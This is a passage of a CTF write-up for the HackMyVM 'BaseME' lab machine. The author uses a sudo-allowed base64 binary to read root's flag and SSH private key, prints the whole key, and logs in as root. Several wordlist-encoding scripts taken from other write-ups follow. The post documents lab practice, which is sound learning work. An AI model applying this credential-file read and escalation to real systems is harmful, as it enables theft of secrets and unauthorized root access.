ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKi4gICAgICAgICAgICAgICAg\nICAKICAgICAgICAgICAgICAgICAgICoqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgKiouICAgICAgICAgIC
AgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgLCogICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICoqICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg\nICAgICAgICAgICAgICAgICAgKiwgICAgICAgICAgICAgICAgICAgICAgICAgICwqICAgICAgICAg\nICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgKiAgICAgICAgICAg\nICAgICAgICAgICAqKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAqLCAgICAgICAgICAgICAgICAuKiAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLiAgICAgICAgICAgKiog\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICoqICAgICAgLCosICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoqICosICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAKSE1WRktCUzY0Cg==\nlucas@baseme:~$ sudo \/usr\/bin\/base64 \/root\/root.txt | base64 -d\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.          
          \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,                                      \n\nHMVFKBS64<\/code><\/pre>\n<p>Well, I got the flag, but that is not what I was after, so keep going for a root shell!<\/p>\n<p>Try the <code>Capabilities<\/code> query that I could not remember yesterday:<\/p>\n<pre><code class=\"language-bash\">lucas@baseme:~$ \/usr\/sbin\/getcap -r 2&gt;\/dev\/null<\/code><\/pre>\n<p>Nothing there, so the only option is to read the private key and then log in over SSH:<\/p>\n<pre><code class=\"language-bash\">lucas@baseme:~$ \/usr\/sbin\/getcap -r 2&gt;\/dev\/null\nlucas@baseme:~$ base64 \/root\/.ssh\/id_rsa | base64 -d\nbase64: \/root\/.ssh\/id_rsa: Permission denied\nlucas@baseme:~$ sudo base64 \/root\/.ssh\/id_rsa | base64 -d\n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAw6MgMnxUy+W9oem0Uhr2cJiez37qVubRK9D4kdu7H5NQ\/Z0FFp2B\nIdV3wx9xDWAICJgtYQUvOV7KFNAWvEXTDdhBwdiUcWEJ4AOXK7+5v7x4b8vuG5zK0lTVxp\nDEBE8faPj3UaHsa1JUVaDngTIkCa6VBICvG0DCcfL8xHBpCSIfoHfpqmOpWT\/pWXvGI3tk\n\/Ku\/STY7Ay8HtSgoqCcf3F+lb9J9kwKhFg9eLO5QDuFujb1CN7gUy8xhgNanUViyCZRwn7\npx+DfU+nscSEfG1zgfgqn2hCbBYqaP0jBgWcVL6YoMiwCS3jhmeFG4C\/p51j3gI6b8yz9a\nS+DtdTpDwQAAA8D82\/wZ\/Nv8GQAAAAdzc2gtcnNhAAABAQDDoyAyfFTL5b2h6bRSGvZwmJ\n7PfupW5tEr0PiR27sfk1D9nQUWnYEh1XfDH3ENYAgImC1hBS85XsoU0Ba8RdMN2EHB2JRx\nYQngA5crv7m\/vHhvy+4bnMrSVNXGkMQETx9o+PdRoexrUlRVoOeBMiQJrpUEgK8bQMJx8v\nzEcGkJIh+gd+mqY6lZP+lZe8Yje2T8q79JNjsDLwe1KCioJx\/cX6Vv0n2TAqEWD14s7lAO\n4W6NvUI3uBTLzGGA1qdRWLIJlHCfunH4N9T6exxIR8bXOB+CqfaEJsFipo\/SMGBZxUvpig\nyLAJLeOGZ4UbgL+nnWPeAjpvzLP1pL4O11OkPBAAAAAwEAAQAAAQBIArRoQOGJh9AMWBS6\noBgUC+lw4Ptq710Q7sOAFMxE7BnEsFZeI62TgZqqpNkdHjr2xuT1ME5YpK5niMzFkkIEd5\nSEwK6rKRfUcB3lyZWaoMoIBJ1pZoY1c2qYw1KTb3hVUEbgsmRugIhwWGC+anFfavaJCMDr\nnCO2g8VMnT\/cTyAv\/Qmi8m868KNEzcuzGV5ozHl1XLffHM9R\/cqPPyAYaQIa9Z+kS6ou9R\niMTjTSxOPnfh286kgx0ry1se9BBlrEc5251R\/PRkEKYrMj3AIwI30qvYlAtNfcCFhoJXLq\nvWystPARwiUs7WYBUHRf6bPP\/pHTTvwwb2bs51ngImpdAAAAgDaWnQ7Lj7Vp+mTjhSu4oG\nptDHNd2uuqB1+CHRcaVutUmknxvxG3p957UbvNp6e0+ePKtAIakrzbpAo6u25poyWugAuz\nX2nQhqsQh6yrThDJlTiDMeV7JNGFbGOcanXXXHt3tjfyrS0+aM87WmwqNyh6nfgy1C5axR\nfKZG8ivz5iAAAAgQD83QmCIcbZaCOlGwgHGcuCUDcxGY1QlIRnbM5VAjimNezGFs9f0ExD\nSiTwFsmITP\/\/njsbRZP2laiKKO6j4yp5LpfgDB5QHs+g4nXvDn6ns64gCKo7tf2bPP8VCe\nFWyc2JyqREwE3WmyhkPlyr9xAZerZ+7Fz+NFueRYzDklWg8wAAAIEAxhBeLqbo6\/GUKXF5\nrFRatLXI43Jrd9pyvLx62KghsnEBEk7my9sbU5dvYBLztS+lfPCRxV2ZzpjYdN4SDJbXIR\ntxBaLJe3c4uIc9WjyxGwUK9IL65rSrRVERHsTO525ofPWGQEa2A+pRCpz3A4Y41fy8Y9an\n2B2NmfTAfEkWFXsAAAALcm9vdEBiYXNlbWU=\n-----END OPENSSH PRIVATE KEY-----\nlucas@baseme:~$ cd \/tmp\nlucas@baseme:\/tmp$ vim id_rsa\n-bash: vim: command not found\nlucas@baseme:\/tmp$ vi id_rsa\nlucas@baseme:\/tmp$ chmod 600 
id_rsa\nlucas@baseme:\/tmp$ ssh root@172.20.10.3 -i id_rsa\nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:Hlyr217g0zTkGOpiqimkeklOhJ4kYRLtHyEh0IgMEbM.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added &#039;172.20.10.3&#039; (ECDSA) to the list of known hosts.\nLinux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Sep 28 12:47:13 2020 from 192.168.1.59\nroot@baseme:~# cd \/root\nroot@baseme:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 Sep 28  2020 .\ndrwxr-xr-x 18 root root 4096 Sep 28  2020 ..\n-rw-------  1 root root   80 Sep 28  2020 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Sep 28  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root 1678 Sep 28  2020 root.txt\ndrwx------  2 root root 4096 Sep 28  2020 .ssh\nroot@baseme:~# cat .bash_history \npasswd\nls -la\nrm .bash_history\ncd ~\nls -la\nrm .bash_history\n\/usr\/sbin\/poweroff \nroot@baseme:~# file \/usr\/sbin\/poweroff\n\/usr\/sbin\/poweroff: symbolic link to \/bin\/systemctl<\/code><\/pre>\n<p>Got a root shell!!!!<\/p>\n<h2>Extra takeaways<\/h2>\n<h3>Base64-encoded wordlist<\/h3>\n<p>This part is simple, and everyone got to show off their skills. Besides the method above, other people&#039;s solutions are also elegant, so I am recording them here to learn from:<\/p>\n<p><a 
href=\"https:\/\/kaianperez.github.io\/baseme\/#reconocimiento-de-puertos\">https:\/\/kaianperez.github.io\/baseme\/#reconocimiento-de-puertos<\/a><\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n# $1 = input wordlist, $2 = output file\n\nwhile IFS= read -r linea\ndo\n   echo \"$linea\" | base64 &gt;&gt; \"$2\"\ndone &lt; \"$1\"<\/code><\/pre>\n<ul>\n<li><code>IFS= read -r linea<\/code> reads each line and stores it in the variable <code>linea<\/code>. <code>IFS=<\/code> ensures that no leading or trailing whitespace (including spaces, tabs, or newlines) is stripped, and <code>read -r<\/code> ensures that no backslash is interpreted as an escape character.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/migue27au.github.io\/C1b3r_F0lio\/challenges\/baseme.html\">https:\/\/migue27au.github.io\/C1b3r_F0lio\/challenges\/baseme.html<\/a><\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n# $1 = input wordlist, $2 = output file\n\nfile=$1\nfile2=$2\nlines=$(wc $file -l | cut -d &#039; &#039; -f 1)\ntouch $file2\n\nfor ((c=0; c&lt;=$lines; c++)); do\n    line=$(cat $file | head -n $c | tail -n 1)\n    b64=$(echo $line | base64)\n\n    echo $b64 &gt;&gt; $file2\ndone<\/code><\/pre>\n<ul>\n<li><code>lines=$(wc $file -l | cut -d &#039; &#039; -f 1)<\/code>: this line counts the lines in <code>$file<\/code> and stores the result in the variable <code>lines<\/code>. <code>wc -l<\/code> counts the lines, and <code>cut -d &#039; &#039; -f 1<\/code> extracts the number from the output.<\/li>\n<li><code>for ((c=0; c&lt;=$lines; c++)); 
do<\/code>: this loop runs from 0 up to and including <code>$lines<\/code>. Because file lines are numbered from 1, the loop actually runs one extra time, so there is nothing to read after the last line of the file, which makes <code>tail -n 1<\/code> output an empty line that is then Base64-encoded.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.freebuf.com\/articles\/web\/324274.html\">https:\/\/www.freebuf.com\/articles\/web\/324274.html<\/a><\/p>\n<pre><code class=\"language-bash\">for i in $(cat \/usr\/share\/wordlists\/SecLists-2022.1\/Discovery\/Web-Content\/common.txt);do echo $i | base64 &gt;&gt; dict64.txt;done<\/code><\/pre>\n<p>Mine is exactly the same as this master&#039;s!<\/p>\n<p>There is also master \u5de8\u9b54&#039;s!<\/p>\n<p><a href=\"https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/BaseME\/\">https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/BaseME\/<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313189.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313189.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412120058819\" style=\"zoom: 33%;\"
\/><\/div><\/p>\n<p>Python is so elegant!<\/p>\n<pre><code class=\"language-python\">import base64\n\n# Read the wordlist and write one Base64 value per line\ninfile = open(&#039;common.txt&#039;, &#039;r&#039;)\noutfile = open(&#039;base64_common.txt&#039;, &#039;w&#039;)\n\nlines = infile.readlines()\n\nfor line in lines:\n    # The trailing newline is stripped, so it is not part of the encoded value\n    dic = line.strip(&#039;\\n&#039;)\n    encoded = base64.b64encode(dic.encode(&#039;UTF-8&#039;))\n    flag = str(encoded, &#039;UTF-8&#039;)\n    outfile.write(flag)\n    outfile.write(&#039;\\n&#039;)\n\ninfile.close()\noutfile.close()<\/code><\/pre>\n<p>Uh, it seems this does not produce the answer either...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>baseme Information gathering Port scanning rustscan -a 172.20.10.3 &#8212; -A Open 172 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-532","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/532","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=532"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/532\/revisions"}],"predecessor-version":[{"id":533,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/532\/revisions\/533"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=532"}],"wp:term":
[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=532"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=532"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}